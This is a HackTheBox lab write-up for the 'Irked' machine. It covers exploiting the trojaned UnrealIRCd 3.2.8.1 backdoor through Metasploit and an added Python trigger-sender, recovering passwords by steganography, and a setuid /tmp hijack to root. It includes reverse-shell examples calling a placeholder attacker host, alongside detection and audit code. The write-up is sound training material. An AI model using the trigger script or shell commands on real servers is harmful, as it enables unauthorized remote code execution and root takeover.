Irked – HackTheBox writeup

Exploitation Summary

Initial Exploitation

  • Vulnerability: backdoor command execution in UnrealIRCd 3.2.8.1 (CVE-2010-2075)
  • Explanation: the 3.2.8.1 source tarball served from UnrealIRCd's mirrors between late 2009 and mid 2010 had been trojaned. Any client whose first bytes are AB; gets the rest of the line passed to system() on the server, as the ircd user, before any registration or password check.

Privilege Escalation

  • Vulnerability: setuid-root binary viewuser
  • Explanation: viewuser runs with root privileges and executes /tmp/listusers, a path inside a world-writable directory. Putting our own program at that path gets it run as root.

Enumeration

nmap -p- -A -T4 10.10.10.117

[screenshot: nmap output]

TCP 22: OpenSSH 6.7p1
TCP 80: Apache 2.4.10
TCP 111: RPC #100000 (rpcbind)
TCP 6697, 8067, 65534: UnrealIRCd
TCP 48953: RPC #100024 (status)

The full-range scan (-p-) matters here: the IRC listener on 65534 and the high rpc.statd port sit outside nmap's default top-1000 ports and would be missed by a plain scan. Note that the three IRC ports are identified as UnrealIRCd without a version string.

Initial Shell Exploitation

Let's first check out the website on port 80.

[screenshot: website]

There is only an image and a short piece of text about IRC, with no other links and no robots.txt. A gobuster scan does not return any additional pages of interest.

A quick check of the UnrealIRCd ports 6697, 8067 and 65534 does not turn up any additional information.

[screenshot: UnrealIRCd port check]

There is not much else to check, so I look for known vulnerabilities in UnrealIRCd.

searchsploit unrealircd

[screenshot: searchsploit results]

searchsploit lists a Backdoor Command Execution exploit for UnrealIRCd 3.2.8.1, which also ships as a Metasploit module. The scan did not give a version, so this is a guess about the build running on the box; the cheapest way to confirm it is to try the exploit, since a non-trojaned server simply treats the trigger as an unknown command. Let's give it a try.

Metasploit

use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhosts 10.10.10.117
set rport 6697
exploit

[screenshot: Metasploit setup and exploit output]

The module's default payload is a reverse shell. Metasploit fills LHOST in automatically, but it may pick the wrong interface, so check that it is your VPN (tun0) address before running exploit.

A low-privileged shell as the ircd user is obtained.
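Metasploit hides what the backdoor actually needs, which is very little. The script below is an added example written for this writeup, not code from the original post or from the Metasploit module: it builds the trigger the trojaned 3.2.8.1 build looks for (the literal bytes AB; at the start of a read from the client, with everything after them handed to system() on the server), sends it to a host and port you supply, and, for the defensive side, flags captured client lines that carry the same prefix. The host 10.10.10.117 and port 6697 come from the page; the command string, the timeouts and the sample IRC lines are assumptions constructed for the example.

```python
import socket
import sys

# The trojaned UnrealIRCd 3.2.8.1 build compares the first three bytes of a
# read from the client against this prefix and passes the remainder to
# system(), before any NICK/USER registration or server password check.
TRIGGER = b"AB;"


def build_trigger(command: str) -> bytes:
    """Return the bytes that make the backdoor run `command` on the server.

    The command runs through /bin/sh -c as the ircd user, so a reverse shell
    such as "nc -e /bin/sh ATTACKER 4444" or a bash /dev/tcp one-liner works.
    """
    return TRIGGER + command.encode() + b"\n"


def send_trigger(host: str, port: int, command: str, timeout: float = 10.0) -> int:
    """Connect, send the trigger and return the number of bytes sent.

    The backdoor never acknowledges anything: the command either ran or it
    did not, so confirm out of band (a listener catching the shell, a DNS
    lookup, a ping). The check is on the start of a read, so the trigger is
    sent on its own, as the first thing the client writes.
    """
    payload = build_trigger(command)
    with socket.create_connection((host, port), timeout=timeout) as s:
        # The server may send a "NOTICE AUTH" banner first; drain it if it
        # arrives, but do not fail if it does not (constructed 2 s wait).
        s.settimeout(2.0)
        try:
            s.recv(1024)
        except socket.timeout:
            pass
        s.settimeout(timeout)
        return s.send(payload)


def is_backdoor_trigger(line: bytes) -> bool:
    """Detection rule: a client line that begins with AB; is never legitimate IRC."""
    return line.startswith(TRIGGER)


def find_triggers(lines):
    """Return (index, command) pairs for every line that would fire the backdoor."""
    hits = []
    for i, line in enumerate(lines):
        if is_backdoor_trigger(line):
            command = line[len(TRIGGER):].rstrip(b"\r\n").decode(errors="replace")
            hits.append((i, command))
    return hits


# Constructed sample of client-to-server traffic (not captured from the box).
# Line 2 contains "AB;" mid-line, which the backdoor ignores; line 3 fires it.
SAMPLE_CLIENT_LINES = [
    b"NICK scanner\r\n",
    b"USER scanner 0 * :scanner\r\n",
    b"PRIVMSG #irked :AB; looks like a trigger but is not at line start\r\n",
    b"AB;id > /tmp/out\r\n",
    b"QUIT :bye\r\n",
]

if __name__ == "__main__":
    if len(sys.argv) == 4:
        # e.g. python3 unreal_trigger.py 10.10.10.117 6697 'nc -e /bin/sh ATTACKER 4444'
        sent = send_trigger(sys.argv[1], int(sys.argv[2]), sys.argv[3])
        print(f"sent {sent} bytes")
    else:
        for idx, cmd in find_triggers(SAMPLE_CLIENT_LINES):
            print(f"line {idx}: backdoor trigger, command={cmd!r}")
```

On this box the plaintext trigger reaches the server on 6697, as the Metasploit run above shows; on a server that terminates TLS on that port the bytes would have to go through a TLS socket instead. The detection side is deliberately simple: the prefix is fixed in the trojaned source, so any network capture or IRC proxy log can be grepped for lines starting with AB;.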

Privilege Escalation – Part 1

Let's poke around /home. User ircd has no files of interest, but a file named .backup under djmardov's Documents folder looks interesting:

[screenshot: .backup file]

It seems to contain a password. Let's try to log in as djmardov with it:

[screenshot: login attempt]

Unfortunately, that doesn't work. Looking at .backup again, it contains the sentence 'Super elite steg backup pw'. "steg" suggests steganography: the string is more likely the passphrase protecting something hidden inside a file than a login password.

The website showed an unhappy smiley face. Let's download that image and check whether anything is hidden in it with steghide, using the passphrase from .backup:

[screenshot: steghide extraction]

All right! That yields another password. Let's try to SSH in as djmardov:

[screenshot: ssh login]

That's it! We get in as djmardov and grab user.txt.

[screenshot: user.txt]

Privilege Escalation – Part 2

After poking around the system for a while, I find a setuid binary that looks interesting. The command below lists setuid files owned by root:

find / -perm -4000 -user root 2> /dev/null

[screenshot: find output]

viewuser stands out, since it is not one of the usual setuid binaries (passwd, su, sudo and friends). Let's try running it:

[screenshot: running viewuser]

It does not give us root directly, but the output shows that viewuser tries to execute /tmp/listusers, which does not exist. Since /tmp is world-writable, we can create that file ourselves. Copying dash to /tmp/listusers and running viewuser again makes it start our shell with its root privileges. dash is a convenient choice because, unlike bash, it does not drop an elevated effective uid on startup (bash would need -p for that):

[screenshot: root shell obtained]

Bingo! Root shell obtained. Let's get the root flag:

[screenshot: root flag]
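The find command above is the first half of the check; the second half, which the writeup did by running viewuser and reading its output, is finding out which setuid binaries execute something under a directory any user can write to. The script below is an added example for this writeup, not part of the original post or of the box: it walks the filesystem for setuid files owned by a given uid (the find command as a function) and scans each one for embedded /tmp, /var/tmp or /dev/shm paths, the same thing strings viewuser | grep /tmp would show. The fake "viewuser" it builds in a scratch directory is constructed for the demo and is not the real binary; the prefix list and the file name are assumptions.

```python
import os
import re
import stat
import sys
import tempfile

# Paths under these directories are writable by every local user. A setuid-root
# program that executes something below them can be hijacked exactly the way
# viewuser was hijacked through /tmp/listusers. (Assumed list, not exhaustive.)
WRITABLE_PATH_RE = re.compile(rb"/(?:tmp|var/tmp|dev/shm)/[\x21-\x7e]+")


def find_setuid_files(root="/", owner_uid=0):
    """Yield regular files below `root` with the setuid bit set, owned by `owner_uid`.

    Same result as: find / -perm -4000 -user root 2>/dev/null
    Unreadable directories are skipped instead of aborting the walk.
    """
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode)
                    and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                yield path


def writable_path_references(path):
    """Return the distinct /tmp-style paths embedded as strings in the file at `path`.

    This is `strings viewuser | grep /tmp` as a function. It is a heuristic:
    a path assembled at run time will not show up here.
    """
    try:
        with open(path, "rb") as f:
            data = f.read()
    except OSError:
        return []
    return sorted({m.group().decode() for m in WRITABLE_PATH_RE.finditer(data)})


def audit(root="/", owner_uid=0):
    """Map each setuid file owned by `owner_uid` to the writable paths it names."""
    findings = {}
    for path in find_setuid_files(root, owner_uid):
        refs = writable_path_references(path)
        if refs:
            findings[path] = refs
    return findings


def make_fake_setuid_binary(directory, name="viewuser", target=b"/tmp/listusers"):
    """Constructed stand-in for the box's viewuser (not the real binary).

    A file with the setuid bit and the target path embedded as a string is all
    the audit looks at, so this is enough to exercise it without root.
    """
    path = os.path.join(directory, name)
    with open(path, "wb") as f:
        f.write(b"\x7fELF" + b"\x00" * 12 + b"setuid\x00system\x00" + target + b"\x00")
    os.chmod(path, 0o4755)  # -rwsr-xr-x, the owner may set this bit on its own file
    return path


def demo():
    """Run the audit over a scratch directory holding the fake binary.

    Filters on the current uid because only root can create root-owned
    files; on the box itself you would call audit("/", 0).
    """
    directory = tempfile.mkdtemp(prefix="suid-audit-")
    fake = make_fake_setuid_binary(directory)
    return fake, audit(directory, owner_uid=os.getuid())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real run on a target, e.g.: python3 suid_audit.py / 0
        root = sys.argv[1]
        uid = int(sys.argv[2]) if len(sys.argv) > 2 else 0
        findings = audit(root, uid)
    else:
        _fake, findings = demo()
    for binary, refs in findings.items():
        print(f"{binary}: references {', '.join(refs)}")
```

A hit from this audit is a candidate, not a confirmed hole: the binary may only read the path, or may check ownership before executing it. Running it, as the writeup did, is still the way to confirm; the audit just tells you which of the setuid files deserve that attention. The fix on the defending side is the mirror image: a setuid program must never execute or trust anything under a world-writable directory.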

Thank you for the box Irked, MrAgent!
